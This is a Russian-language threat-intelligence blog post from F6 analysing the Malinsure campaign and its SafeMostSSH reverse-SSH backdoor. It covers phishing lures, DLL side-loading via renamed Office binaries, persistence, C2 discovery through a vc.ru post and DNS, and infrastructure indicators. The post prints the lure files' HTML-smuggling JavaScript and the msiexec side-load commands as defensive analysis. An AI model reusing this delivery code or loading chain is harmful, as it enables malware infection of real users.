Вернуться назад

Страховой случай: изучаем инструменты и инфраструктуру новой угрозы Malinsure

Аналитики F6 Threat Intelligence обнаружили новую угрозу для российских компаний. Группировка использует собственный бэкдор SafeMostSSH и нестандартные TTPs.

Страховой случай: изучаем инструменты и инфраструктуру новой угрозы Malinsure

UPDATE (14.08.2026, 17:40)

После публикации блога про Malinsure наше исследование получило неожиданное продолжение: мы получили сообщение о том, что атаки проводили в рамках Red Teaming (учений для оценки киберустойчивости организации, во время которых специально сформированная команда имитирует действия реальных злоумышленников). С учётом этой версии мы обновили оценку кейса.

В современных реалиях нельзя недооценивать вновь выявляемые угрозы, особенно когда активность, как в этом случае, оказывается нетипичной, атакующие создают развитую инфраструктуру с десятками доменов, используют нетипичный способ сокрытия С2 и TTPs. Если в ходе Red Teaming специалисты имитируют действия злоумышленников, то реальные киберпреступники, чтобы осложнить детектирование атак, наоборот, могут имитировать Red Teaming, используя легитимное ПО и инфраструктуру.

В совокупности все характеристики активности выглядели как достаточное свидетельство появления новой группировки.

Одна из задач киберразведки — быть на острие событий в киберпространстве, видеть и знать тактики, техники и характеристики атакующих, чтобы защищать своих клиентов. Бдительность в кибербезе не бывает излишней. Этот кейс — пример того, как киберразведка может обнаружить не только реальные кибератаки, но и учения в формате Red Teaming.

В июле 2026 года на одной из публичных онлайн-песочниц специалисты департамента киберразведки F6 обнаружили семплы вредоносного программного обеспечения, загруженные с территории Российской Федерации и объединенные именованием файлов, связанным с тематикой добровольного медицинского страхования (ДМС). Эти семплы не удалось атрибутировать известному ВПО, в связи с чем данное ПО — бэкдор — признано уникальным.

Вредоносной программе мы присвоили название SafeMostSSH, образованное от следующих уникальных признаков: Safe — от URL-адреса, который использовался в первом канале связи с C2, Most — от слова telemost, упомянутого в имени домена, через который также осуществлялась доставка команд, и SSH — указывает на основной протокол взаимодействия.

Мы не обнаружили какой-либо известной группировки, которая использовала бы такое ВПО, сетевую инфраструктуру, а также TTPs, в связи с чем начали отслеживать эту активность как новый кластер угроз с наименованием Malinsure (от англ. insure — страхование, по профилю компании, от имени которой распространяли файлы-приманки). Содержимое обнаруженных файлов-приманок связано также с компаниями из финансовой сферы и топливно-энергетического комплекса, что указывало на вероятный спектр целей.

В числе особенностей ВПО, которое использовали атакующие, можно отметить необычный способ получения новых адресов С2 (управляющих серверов) из внешних источников. В качестве одного из таких источников используется пост на популярной российской медиаплатформе о бизнесе и технологиях vc.ru, посвящённый автозапчастям. В тексте поста размещены две ссылки, которые формально ведут на PNG-файл, размещённый на Google.com, однако на самом деле эти ссылки — ложные: Google не находит на сайте запрашиваемый URL. Ложные ссылки используются для маскировки С2-адресов, которые зашифрованы в теле ссылки: ВПО декодирует эту информацию и получает необходимые данные.

Более подробно эти и другие особенности атакующих рассмотрим далее.

Зловредное страхование

Первым шагом, с которого начиналась атака, были фишинговые письма. Как пример — электронное письмо с темой «Акция! ДМС со скидкой до 60% для родственников» (SHA-1: 40f799f997cb3a8162bded7b64575cad519ca6db), направленное с электронного почтового ящика mutewinter78@gmail.com и почтового сервера, расположенного на хосте 191.44.37[.]222. Внутри — файл с именем «ДМС обновления.pdf» (SHA-1: 9a5d438119eb1548aa5db803eeefb4fcbad12344).

Рис. 1 — Фишинговое письмо
Рис. 1 — Фишинговое письмо

Файл содержит информацию о порядке действий, необходимых для получения документа, связанного с обновленной программой ДМС российской страховой компании. В тексте документа пользователю предлагают перейти по ссылке: hxxps://{название компании}-filesharing[.]ru/%D0%98%D0%B7%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F%20%D0%B2%20%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B5%20%D0%94%D0%9C%D0%A1.rar.

В результате перехода по указанной ссылке на устройство жертвы загружается архив с именем Изменения в программе ДМС.rar (SHA-1: 01bfd6f549ae0b6458bb26b605dbdc2e468ef576).

Анализ ВПО доступен в F6 Malware Detonation Platform

Архив содержит следующие файлы:

● Программа ДМС в ред 13.07.2026.docx.exe (SHA-1: 6857ece28c264b5099377eb54cb8a5e2e3ea8bd2);

● settings (SHA-1: 896bae561c66b3f82ced36deed075b47f5b46069);

● C2R64.dll (SHA-1: 57cbbf5ab2d5571fef8a2093806ca56372069343);

● AppVIsvSubsystems64.dll (SHA-1: c97ed35b1d90b0f2c3f0e3d621f2b5d4b2dc1377).

В ходе дальнейшего исследования обнаружены и другие семплы, аналогичные вышеуказанному:

Имя файла Ссылка Архив, загружаемый по ссылке Содержимое архива
ДМС для родственников.pdf (SHA-1: 470dd3478be26d5cfdca38f95f585dd9d9374780) hxxps://{название компании}-cdn[.]ru/%D0%A1%D1%82%D1%80%D0%B0%D1%85%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%20%D1%80%D0%BE%D0%B4%D1%81%D1%82%D0%B2%D0%B5%D0%BD%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2[.]zip Страхование родственников.zip (SHA-1: fdb431b2bdea01be2a1b543accaf41efe25b6b05) Коммерческое предложение по ДМС.docx.exe (SHA-1: 6857ece28c264b5099377eb54cb8a5e2e3ea8bd2); resources (SHA-1: a43e9145e9905024f04fb95a3a6982227f8f794c); C2R64.dll (SHA-1: 93fc8fe2f27dac35febf56657097d90829d11c7c); AppVIsvSubsystems64.dll (SHA-1: c97ed35b1d90b0f2c3f0e3d621f2b5d4b2dc1377).  
ДМС для родственников.pdf (SHA-1: effef9a2ba91dacbf9a123d9b8b4dafbd5613db9) hxxps://cdn-{название компании}[.]ru/%D0%A1%D1%82%D1%80%D0%B0%D1%85%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%20%D1%80%D0%BE%D0%B4%D1%81%D1%82%D0%B2%D0%B5%D0%BD%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2[.]zip Страхование родственников.zip (SHA-1: 825a2dd36396be4cc51f150744ff4fd4697f03ad) Коммерческое предложение по ДМС.docx.exe (SHA-1: 6857ece28c264b5099377eb54cb8a5e2e3ea8bd2); resources (SHA-1: a43e9145e9905024f04fb95a3a6982227f8f794c); C2R64.dll (SHA-1: 906a389fa80e570199b8ba6692294f48610127e1); AppVIsvSubsystems64.dll (SHA-1: c97ed35b1d90b0f2c3f0e3d621f2b5d4b2dc1377).
ДМС обновления.pdf (SHA-1: 6c5d283d80dfac7d5a775084281c665fce307acd) hxxps://{название компании}-files[.]ru/%D0%98%D0%B7%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F%20%D0%B2%20%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B5%20%D0%94%D0%9C%D0%A1.rar Изменения в программе ДМС.rar (SHA-1: 7f8035c8dad5663b0e7112ddba62be3420a3f23e) Программа ДМС в ред 13.07.2026.docx.exe (SHA-1: 6857ece28c264b5099377eb54cb8a5e2e3ea8bd2); settings (SHA-1: 896bae561c66b3f82ced36deed075b47f5b46069); C2R64.dll (SHA-1: e5932991c81f015cb678b9ab02a3c51914efd9ce); AppVIsvSubsystems64.dll (SHA-1: c97ed35b1d90b0f2c3f0e3d621f2b5d4b2dc1377)  
ДМС обновления.pdf (SHA-1: e006219905c91a14432dd8b1e468882ecc212dd7) hxxps://files-{название компании}[.]ru/%D0%98%D0%B7%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F%20%D0%B2%20%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B5%20%D0%94%D0%9C%D0%A1.rar Изменения в программе ДМС.rar (SHA-1: baf64b0441921b7129cb973519f121c2dece790f) Программа ДМС в ред 13.07.2026.docx.exe (SHA-1: 6857ece28c264b5099377eb54cb8a5e2e3ea8bd2); settings (SHA-1: 896bae561c66b3f82ced36deed075b47f5b46069); C2R64.dll (SHA-1: b6288e75a53ccdbcfca034d153950147937dd77b); AppVIsvSubsystems64.dll (SHA-1: c97ed35b1d90b0f2c3f0e3d621f2b5d4b2dc1377)  
Пенсионные отчисления.rar (SHA-1: 59c13de01add9c7eb1285d6c689cd8dc72ba7ea0) Обновленный порядок пенсионных отчислений.docx.exe (SHA-1: 6857ece28c264b5099377eb54cb8a5e2e3ea8bd2) db (SHA-1: f55958b10092257aa6389f5aba6f04f1a6511874) C2R64.dll (SHA-1: 9ea8a180f1e04e2b89bf7339bf174c1687952b16)AppVIsvSubsystems64.dll (SHA-1: c97ed35b1d90b0f2c3f0e3d621f2b5d4b2dc1377)
Зарплатный проект ***нефть (2).zip (SHA-1: fb941439c46df1c4c6b09be37f7b3e0ce38c2979) config (SHA-1: 98cdaacd7d9085a16dbd8494b6fa76fc5aaa5949) AppVIsvSubsystems64.dll (SHA-1: b643e3d44d1953e730728255c458c13ebba4c789)
ZIP-архив (SHA-1: 8c496e00831b32e985bfe6925cee7691bc74b81f) config (SHA-1: 98cdaacd7d9085a16dbd8494b6fa76fc5aaa5949) AppVIsvSubsystems64.dll (SHA-1: 3c17498eb5c8ec311cab53f497e7a30da954f5dd)
ZIP-архив (SHA-1: 5a386ee1dcdeb9fedb4ff97caf0e3c52b9b8a248 ) Config (SHA-1: 98cdaacd7d9085a16dbd8494b6fa76fc5aaa5949) AppVIsvSubsystems64.dll (SHA-1: b4a3e7a911a8193c4b2cc44032523f2dacc5d2a4)
ZIP-архив (SHA-1: f130faf86e3ac0a4685ba5ef9181b59b8443927a ) C2R64.dll (SHA-1: e5932991c81f015cb678b9ab02a3c51914efd9ce)
ZIP-архив (SHA-1: 6504f576ad38f04104702a9d6c569adf341e1376 )   C2R64.dll (SHA-1: a0e0ec0e6246dbf9a82cde34d9a95532b3fbec3c)
AppVIsvSubsystems64.dll (SHA-1: 33cc837d54834d25aabd3b2c885eb7f6398ffc96)
C2R64.dll (SHA-1: 740375e7e88229ba6035afe00b21a0c2f91d4f2a)
rpc64.dll (SHA-1: ac0f4222088f4dea22d890e7c294a53eb867b640)
rpc64.dll (SHA-1: 4d107d9ba2ed6416c4dab448b907f0dcaa76fada)

Содержимое обнаруженных файлов-приманок, связанное с компаниями из страховой, финансовой и нефтяной сфер, может указывать на широкий спектр целей атакующих.

Стоит отметить, что в ходе исследования был обнаружен дополнительный способ доставки полезной нагрузки, в рамках которого атакующие распространяли shtml- и htm-файлы.

Имя файла Загружаемый архив Содержимое архива
Зарплатный проект.htm (SHA-1: cfe266f0aa8629fd724d3af1ce496c49c6218a92) Зарплатный проект ***нефть.zip (SHA-1: 2570d0a0fccfa0532cce43f8e44f12b0b5ecb027) config (SHA-1: 98cdaacd7d9085a16dbd8494b6fa76fc5aaa5949) Зарплатный проект ***нефть.pptx.exe (SHA-1: 90f2a35252a3865f18b1720915ac28a348e042a3) AppVIsvSubsystems64.dll (SHA-1: ee5dd0c98709e645c3e13ec2da0136dd9dd4ae17)
Специальное предложение.shtml (SHA-1: 626360ea0408845db2e0dfab23ba1a2b1b767956) Специальное предложение ***нефть.rar (SHA-1: 7db4f6ecbdf4955d411ab947110d5b6a12622662) Storage (SHA-1: 8b43c1d85a2db0f62c5fa644d4db0a32efb962ec) Вклады и накопительные счета ***Банка.pptx.exe (SHA-1: 90f2a35252a3865f18b1720915ac28a348e042a3) AppVIsvSubsystems64.dll (SHA-1: a84ee1d39ec05b362a3b84a7680aa1e304e0acd0)

Указанные файлы содержат полезную нагрузку, закодированную в base64 и hex соответственно. В результате запуска данных файлов происходило извлечение полезной нагрузки, которая сохранялась на устройстве жертвы в виде архива.

<animate onrepeat=«var b=atob('{Полезная нагрузка}'.split('').reverse().join('')),a=new Uint8Array(b.length),i=0;for(;i<b.length;i++)a[i]=b.charCodeAt(i);var b=new Blob([a],{type:'application/octet-stream'});var u=window.URL.createObjectURL(b);fetch(u).then(function(r){return r.blob()}).then(function(bl){var bu=window.URL.createObjectURL(bl);var l=document.createElementNS('http://www.w3.org/1999/xhtml','a');l.href=bu;l.download='Специальное предложение ***нефть.rar';(document.body||document.documentElement).appendChild(l);l.click();l.remove();window.URL.revokeObjectURL(bu);window.URL.revokeObjectURL(u);var _d=document;try{if(parent&&parent.document!==_d)_d=parent.document}catch(_e){}var _f=function(){var sl=_d.getElementById('sl'),sd=_d.getElementById('sd');if(sl)sl.style.display='none';if(sd)sd.style.display='block'};var _lo=false,_w=window;try{if(parent&&parent!==window)_w=parent}catch(_e){}_w.addEventListener('blur',function(){_lo=true});_w.addEventListener('focus',function(){if(_lo)_f()});setTimeout(function(){if(!_lo)_f()},1500)});» attributeName=«x» dur=«0.01s» repeatCount=«2»></animate>
<div onfocusin=«var h='{Полезная нагрузка}',a=new Uint8Array(h.length/2),i=0;for(;i<a.length;i++)a[i]=parseInt(h.substr(i*2,2),16);var b=new Blob([a],{type:'application/octet-stream'});var r=new FileReader();r.onloadend=function(){var l=document.createElementNS('http://www.w3.org/1999/xhtml','a');l.href=r.result;l.download='Зарплатный проект *** нефть.zip';(document.body||document.documentElement).appendChild(l);l.click();l.remove();var _d=document;try{if(parent&&parent.document!==_d)_d=parent.document}catch(_e){}var _f=function(){var sl=_d.getElementById('sl'),sd=_d.getElementById('sd');if(sl)sl.style.display='none';if(sd)sd.style.display='block'};var _lo=false,_w=window;try{if(parent&&parent!==window)_w=parent}catch(_e){}_w.addEventListener('blur',function(){_lo=true});_w.addEventListener('focus',function(){if(_lo)_f()});setTimeout(function(){if(!_lo)_f()},1500)};r.readAsDataURL(b);» autofocus tabindex=«1»></div>
Рис. 8 — Содержимое shtml-файла
Рис. 8 — Содержимое shtml-файла

Цепочки атак

В ходе исследования указанных файлов специалисты F6 выявили две вариации цепочки атак, мало отличающиеся между собой.

В общем случае в основе цепочки атаки лежит доставка архива, который содержит легитимный файл winword.exe или powerpnt.exe с измененным именем, мимикрирующим под тематику рассылки и использующим двойное расширение в имени, а также файлом-приманкой и одним или двумя DLL-файлами, скрытыми от пользователя посредством установки соответствующего атрибута.

Первый вариант

Рис. 11 — Содержимое архива, используемого в первой цепочке атак
Рис. 11 — Содержимое архива, используемого в первой цепочке атак

В первом варианте распространяется RAR- или ZIP-архив с расположенной внутри одноименной директорией. Внутри нее располагаются 4 файла:

● EXE-файл (в примере — Программа ДМС в ред 13.07.2026.docx.exe) — легитимный winword.exe-файл (SHA256: e5d22ec52db82df6fefd8a093ca57400eefb735a278229cd955dfb23565f40e0);

● файл-приманка (в примере — settings) — отвлекающий документ, который запускается в результате исполнения цепочки атаки;

● AppVIsvSubsystems64.dll — в данном случае легитимная библиотека, загружаемая исполняемым файлом winword.exe;

● C2R64.dll — вредоносная библиотека, загружаемая техникой DLL Side-Loading, библиотекой AppVIsvSubsystems64.dll.

После запуска легитимного файла winword будет загружена библиотека AppVIsvSubsystems64.dll, которая, в свою очередь, загружает вредоносную библиотеку C2R64.dll. Данная библиотека после загрузки выполнит основную функцию, в ходе которой перезапустит себя командой:

C:\Windows\System32\msiexec.exe /Passive /Quiet -z «{filepath}\C2R64.dll»

Это позволяет реализовать технику LOLbin (Living off the Land), при этом вызывается функция DllUnregisterServer, которая является одной из точек входа в реализацию вредоносного кода.

C примером техники можно ознакомиться в проекте lolbas.

Второй вариант

Рис. 12 — Содержимое архива, используемого во второй цепочке атак
Рис. 12 — Содержимое архива, используемого во второй цепочке атак

В втором варианте цепочки атаки вместо winword.exe используется легитимный файл powerpnt.exe (SHA-1: 90f2a35252a3865f18b1720915ac28a348e042a3). В данной цепочке вредоносной библиотекой является сразу AppVIsvSubsystems64.dll без использования C2R64.dll. При загрузке вредоносной библиотеки также используется перезапуск себя с техникой LOLbin через команду:

C:\Windows\System32\msiexec.exe /Passive /Quiet -z «{filepath}\AppVIsvSubsystems64.dll».

Технические детали (SafeMostSSH)

SafeMostSSH — многофазный бэкдор, использующий легитимные бинарные файлы Microsoft (winword.exe, powerpnt.exe) в качестве отправной точки. В ходе исполнения ВПО реализовывает DLL‑Side‑Loading, LOLbin‑техники (msiexec). Кроме того, SafeMostSSH автоматически восстанавливает свои компоненты из скрытого бэкапа и умеет получать новые C2‑точки из публично доступных ресурсов (VC.ru, CNAME‑lookup).

В результате исполнения ВПО обеспечивает атакующему постоянный обратный SSH‑туннель к управляемому С2. Оригинальные точки входа ВПО — функции DllRegisterServer и DllUnregisterServer, которые вызывают функцию main_DllUnregisterServer. Также в коде найдены и другие функции, с которых запускалась часть активности, к примеру main_main, но ее запуск в коде найден не был. Вероятно, она использовалась при тестировании ВПО.

После запуска выполняется поиск файла по SHA256-хеш-сумме в директории, где расположена библиотека:

● e5d22ec52db82df6fefd8a093ca57400eefb735a278229cd955dfb23565f40e0 (для winword.exe)

● 6fd5e00ebc677da738851c0adbb85f9332ccd2459827defd4ed38a25bfb02c37 (для powerpnt.exe)

Далее будет найден файл-приманка, его имя жестко закодировано внутри ВПО, в анализируемом файле имя — settings. Затем выполняется проверка наличия данного файла в директории с библиотекой и запуск через Word или PowerPoint в зависимости от того, какой файл был найден по хеш-сумме. При попытке запустить документ изначально используется файловый путь по умолчанию:

● C:\Program Files\Microsoft Office\root\Office16\winword.EXE и C:\Program Files (x86)\Microsoft Office\Office16\winword.EXE для winword.exe

● C:\Program Files\Microsoft Office\root\Office16\powerpnt.EXE и C:\Program Files (x86)\Microsoft Office\Office16\powerpnt.EXE для powerpnt.exe

В случае если запуск не выполнен, ВПО будет использовать файл, найденный по хеш-сумме из директории библиотеки.

Далее происходит проверка, находится ли зараженная система в домене, путем выполнения функции NetGetJoinInformation и проверки флага подключения к рабочей группе (NetSetupDomainName). В случае, если компьютер не в домене, ВПО завершает работу. В ином случае продолжает свое исполнение.

Затем ВПО собирает метаинформацию о ВПО и процессе исполнения, которая собирается в символьную строку и добавляется к одному из доменных имен, которые хранятся в файле в закодированном виде описанным ранее алгоритмом:

● app.telemost-ads.net

● static.telemost-ads.net

● ms.telemost-ads.net

Далее ВПО будет последовательно задействовать указанные домены для получения ассоциированного IP-адреса. Процесс будет продолжаться либо до тех пор, пока не будет получен нужный IP либо пока не закончится список доменов. Однако в ходе исследования применения данного IP-адреса обнаружено не было. Шаблон формирования домена: {1}{2}{3}{4}{5}{6}.{domain}, где

● {1} — символ из набора (A | B | C) в зависимости от того, найден был ранее файл winword.exe, powerpnt.exe или другой результат;

● {2} — символ из набора (G | H | I) в зависимости от того, был запущен файл-приманка, презентация или ничего запущено не было;

● {3} — символ из набора (J | K | L | M | N) в зависимости от конфигурационной строки соответствующей темы файлов-приманок, под которую мимикрирует атака;

● {4} — символ из набора (U | I | O) в зависимости от типа килчейна A (цепочка атаки с использованием библиотеки C2R64), B (цепочка атаки где вредоносный код находится сразу в библиотеке AppVIsvSubsystems64) или не соответствующий ни одному из представленных;

● {5} — символ из набора (W | Y) в зависимости от того, запущен ли файл из директории для закрепления в системе или нет (логика закрепления в системе описана ниже);

● {6} — жестко закодированная строка внутри семпла (в примере из исследуемого файла abe3, но также были найдены: 0b6d, 8bee, 9ab4, 7bae, c1f5, 48f3, b43b).

Пример сгенерированного домена: agluyabe3.static.telemost-ads.net.

Далее выполняются проверки закрепления в системе и наличия бекапов.

Проверка закрепления

Логика закрепления в системе описана ниже. На текущем этапе выполняется проверка наличия файлов в одном из четырёх выбираемых для закрепления файловых путей, а также наличия одного из LNK-файлов в Startup-директории.

Проверка наличия бэкапов

Логика создания бэкапа также описана ниже. В данном этапе выполняется проверка наличия всех необходимых файлов по файловому пути %APPDATA%\Microsoft\Internet Explorer\UserData\Low.

Если на этапе проверок они не были выполнены успешно (не найдены все необходимые файлы), процесс исполнения переходит к закреплению в системе и созданию бэкапов.

Закрепление в системе

Для закрепления в системе, ВПО случайным образом выбирает один из файловых путей:

● %APPDATA%\Microsoft\Office\Cache

● %APPDATA%\Microsoft\Edge\History

● %APPDATA%\Microsoft\Excel\Recents

● %APPDATA%\Microsoft\Spelling\ru-RUs

И выполняет копирование собственных файлов в данную директорию. В случае с изначальным файлом, являющимся легитимным winword.exe или powerpnt.exe, файлы копируются с оригинальным названием. Также перемещенным файлам добавляются флаги скрытых и системных файлов.

После этого ВПО переходит к созданию LNK-файла и INI-файла в директории автозапуска. Имя LNK-файла будет сформировано в зависимости от случайно выбранной директории:

● Word.lnk

● Microsoft Edge.lnk

● Excel.lnk

● Share Point.lnk

Создание LNK-файла выполняется через изначальное создание файла desktops.ini в директории автозагрузки и последующим его переименованием в заранее определенное имя для LNK. Сам ярлык запускает файл winword.exe или powerpnt.exe из директории, в которую были скопированы файлы.

Создание бэкапов

ВПО копирует файлы в директорию %APPDATA%\Microsoft\Internet Explorer\UserData\Low и скрывает файлы. Копирование выполняется по следующему соответствию имен:

Легитимный winword или powerpnt -> userSettings.db

AppVIsvSubsystems64.dll -> userData.db

C2R64.dll -> userLog.db (только для цепочки заражения с использованием winword.exe)

LNK -> image.edb

Также ВПО создает в данной директории desktops.ini с содержимым в виде директории, в которую были скопированы файлы для закрепления в системе, и извлекает из собственных ресурсов (Embed) файл по внутреннему расположению dll/rpc64.dll с именем rpc64.dll. Ко всем файлам внутри директории также добавляются флаги скрытых и системных файлов.

Далее выполняется загрузка в память извлеченной библиотеки rpc64.dll, использующейся для создания невидимого пользовательского окна, логирования сообщений, проверки персистентности системы и ее востановлении из директории бэкапов. Подробнее она описана в разделе SafeMostSSH.Monitor.

Запуск сервиса клиента reverse ssh

Перед началом проверки состояния исполнения и запуска основной логики обратного ssh ВПО выполняет установку настроек через функцию makeInitialSettings. Стоит отметить, что логика настроек полностью пересекается с аналогичной функцией в публично доступной реализации инструмента.

В коде исследуемого ВПО обнаружена строка с опечаткой в слове host «Couldnt get hosft name: %s», которая отсутствует в вышеуказанных проектах.

Рис. 13 — Строка с опечаткой, обнаруженная в коде DLL
Рис. 13 — Строка с опечаткой, обнаруженная в коде DLL

Ниже представлен разбор основных настроек на примере и пояснение к ним:

  • «32b2f2eb6d2d72f4e4c4bd52d2e2d4acbcc4bd72b2ab5323131060071e066b219» — Hex-строка части C2, сжатого через Gzip
  • «4896263b9af31d49666a701d2e5320e751ce8b26f3b5395dc01deb35d5f9f124» — Fingerprint
  • true — установленный флаг аналогичный полю настроек ProxyUseHostKerberos
  • true — установленный флаг аналогичный полю настроек ProxyAutoDetect
  • «/uzqbepcdfzfwh0e» — установленный путь для WS-запросов, поле аналогичное настройке WSPath

Исходя из изученных нами образцов ВПО установлено, что в настройках отличались только C2-адрес и WSPath.

Далее выполняется проверка, является ли запущенный процесс сервисом (стандартная функция IsWindowsService). Если процесс не является сервисом или при проверке возникла ошибка, выполняется переход к запуску основной логики запуска reverse ssh клиента (функция Run). В ином случае процесс исполнения перейдет к функции запуска сервиса runService с передачей имени сервиса «rssh». Также и основная функция с проверкой выполнения как сервис и запуск активности представлена в примерах Google. Внутри функции runService к запуску передается функция Run. Этот код также используется в проекте Reverse SSH.

Основная логика клиента reverse ssh не претерпела каких-либо значительных изменений: протокол взаимодействия полностью соответствует изначальному. Основное отличие данных функций заключается в декодировании и получении дополнительных C2-адресов. Все адреса, которые хранятся внутри файла и на внешнем ресурсе, имеют вид части Hex-строки по результату сжатого алгоритмом Gzip управляющего сервера. Пример декодирования:

  1. закодированная строка (пример: 32b2f2eb6d2d72f4e4c4bd52d2e2d4acbcc4bd72b2ab5323131060071e066b219) оборачивается в строку формата 1f8b080000000000000{coded_str}000000;
  2. приводится в бинарный формат из Hex-строки;
  3. выполняется декомпрессия алгоритмом Gzip.

В итоговом примере будет получен C2 — wss[:]//safe-surfing[.]ru:443

После начала работы декодируются зашитые внутри семпла C2-адреса. В известных нам примерах в каждом семпле был только один C2-адрес, однако они могут быть перечислены через разделительный символ «,». При подключении к C2 ведется подсчет попыток подключения. Если попыток было более 100, семпл прекращает свою работу, после четвёртой неудачной попытки семпл переходит к сбору новых C2 из внешних источников.

Сбор С2 из внешних источников

У исследуемого ВПО мы обнаружили два способа получить новые С2-адреса из внешних источников.

Первый способ: VC.ru

ВПО выполняет запрос к ссылке, ведущей на пост пользователя на платформе vc.ru: https://vc.ru/id6030334/3009787-gde-nayti-zapchasti-dlya-great-wall-safe (опубликован 3 июля 2026 года, 12 августа по обращению F6 удалён администрацией платформы).

Рис. 14 — Пост на платформе vc.ru, используемый для получения информации о C2
Рис. 14 — Пост на платформе vc.ru, используемый для получения информации о C2

При запросе используется User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36. С получаемой страницы собираются ссылки, соответствующие регулярному выражению:

«https?://(?:[a-zA-Z0-9-]+\\.)*google\\.com[^\\s\»'<>()\\\\]*".

В примере выше собранные ссылки:

https://google[.]com/32b2f2eb6d2d72f2d48492c492d4f4d2a2a49d62b2ab53231310600ec27324219.png
https://google[.]com/32b2f2eb6d2d72f4ecc4d4a2c2ec92f4ad52b2ab5323131060036feec6b17.png

Из данных ссылок будут взяты Hex-строки имен файлов, к которым выполняется обращение, после чего они будут декодированы по алгоритму, аналогичному тому, который используется для декодирования хранящихся в семпле C2. В данном примере декодированные адреса:

wss[:]//updatewebrtc[.]ru:443

  wss[:]//sambastore[.]ru:443

Второй способ: CNAME lookup

Внутри ВПО хранится закодированный (34b2ed62b49cd49cdcd2f2ed14d4c29d6cb4b2d01003c75a27b13) домен cs.telemost-ads.net, к данному домену выполняется запрос CNAME-записи.

Рис. 15 — Информация о CNAME-записи домена cs.telemost-ads.net
Рис. 15 — Информация о CNAME-записи домена cs.telemost-ads.net

После из полученного поля будут удалены символы «.» и данная строка будет декодирована стандартным алгоритмом. Декодированные адреса из примера:

wss[:]//tlswebsurfing[.]ru:443, wss[:]//glonastracking[.]ru:443

После чего данные адреса собираются в один список и используются для создания соединения.

Логирование

Внутри библиотеки также реализовано отслеживание подгрузки библиотек, логирование ведется в файл по пути C:\ProgramData\dll_load.txt, с шаблоном записи: {ms_system_startup}|{username}: {main_module_path} -> {loaded_dll_path} | {empty_str}\n. Пример: 978481421|{username}: C:\Windows\System32\rundll32.exe -> {filepath}\AppVIsvSubsystems64.dll | . Также внутри файла присутствует функция с дополнительным логированием в файл c:\programdata\debug_error_log.txt, которая логирует строки с форматом [NTSTATUS ERROR] %s | Status Code: 0x%08X, однако ее использования найдено не было.

SafeMostSSH.Monitor

Данная библиотека извлекается и подгружается в память ВПО в ходе инициализации. Основная задача данной библиотеки — создание окна и отслеживание сообщений с целью логирования состояния, контроля бекапирования и закрепления в системе ВПО.

После запуска DllMain функции устанавливается перехват функции GetMessageW. Однако перехват будет выполнен единожды для запуска собственного потока мониторинга состояния, после того как был выполнен перехват и запущен поток, хук будет отключен и происходит установка флага инициализации потока, проверка которого выполняется перед запуском нового потока для предотвращения повторного запуска.

Поток мониторинга создает невидимое пользовательское окно с собственным обработчиком и названием «SessionMonitorWindowClass». После этого выполняется регистрация WTS-уведомлений (Windows Terminal Services или Remote Desktop Services в новых версиях Windows). Далее выполняет переход к функции инициализации всех необходимых файловых путей. После чего выполняется получение и обработка сообщений для созданного окна.

Обработчик окна

Обрабатывает сообщения:

● WM_WTSSESSION_CHANGE

● WM_ENDSESSION

● WM_QUERYENDSESSION

● WM_DESTROY

● WM_CLOSE

При получении сообщения WM_WTSSESSION_CHANGE выполняет логирование получаемых событий:

● WTS_REMOTE_CONNECT

● WTS_REMOTE_DISCONNECT

● WTS_SESSION_LOGOFF

● WTS_SESSION_LOCK

● WTS_SESSION_UNLOCK

Сами события далее обрабатываются по умолчанию.

Также при получении событий WM_ENDSESSION, WM_DESTROY и WM_CLOSE выполняется обработка по умолчанию и в случае WM_ENDSESSION выполняется логирование информации о получении сообщения.

В случае получения сообщения WM_QUERYENDSESSION выполняется проверка наличия необходимых файлов в директории, предназначенной для достижения персистентности в системе (набор winword.exe, AppVIsvSubsystems64.dll, C2R64.dll или powerpnt.exe, AppVIsvSubsystems64.dll) и проверка наличия LNK-файла в Startup-директории. Если проверка наличия файлов не пройдена, выполняет копирование файлов из директории бэкапов в директорию для закрепления в системе, в случае успешного копирования файлов выполняет копирование LNK-файла в Startup-директорию с именем «Word.lnk».

Исследование сетевой инфраструктуры

В ходе анализа сетевых индикаторов, полученных на первоначальном этапе, а также в результате технического исследования специалисты F6 обнаружили уникальный ответ веб-сервера, объединяющий указанные ресурсы:

 HTTP/1.1 405 Method Not Allowed
Content-Length: 31
Content-Security-Policy: default-src 'none'
Content-Type: text/plain; charset=utf-8
Date: Mon, 13 Jul 2026 07:23:53 GMT
MS-Author-Via: DAV
Server: Python/3.12 aiohttp/3.13.5
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-MSDAVEXT: 1 

Указанный ответ позволил выявить следующие домены и связанные с ними хосты, нейминг и ответ которых позволяют с высокой долей уверенности отнести их к данной вредоносной кампании:

Домен Хост
filesharing-sogaz[.]ru 104[.]171[.]130[.]199
cdn-sogaz[.]ru 191[.]44[.]37[.]235
sogaz-cdn[.]ru 191[.]44[.]38[.]70
sogaz-files[.]ru 5[.]129[.]200[.]198
webdav-sogaz[.]ru 62[.]76[.]228[.]28
sogaz-webdav[.]ru 80[.]64[.]31[.]126
files-sogaz[.]ru 83[.]217[.]200[.]210
sogaz-filesharing[.]ru 188[.]225[.]27[.]102
files-sogaz[.]ru 83[.]217[.]200[.]210
f1iles-sogaz[.]ru

Также в ходе анализа данных доменов, посредством использования идентификатора владельца ресурса, были выявлены две группы новых доменов.

Первую группу образуют домены cdn-sogaz[.]ru, webdav-sogaz[.]ru, sogaz-cdn[.]ru и sogaz-webdav[.]ru, и выявленные связанные с ними домены:

● oak-fern[.]ru

● wild-harbor[.]ru

● darkvale[.]ru

● zashchita-semyi[.]ru

● tvoyapolis[.]ru

● polisstrah[.]ru

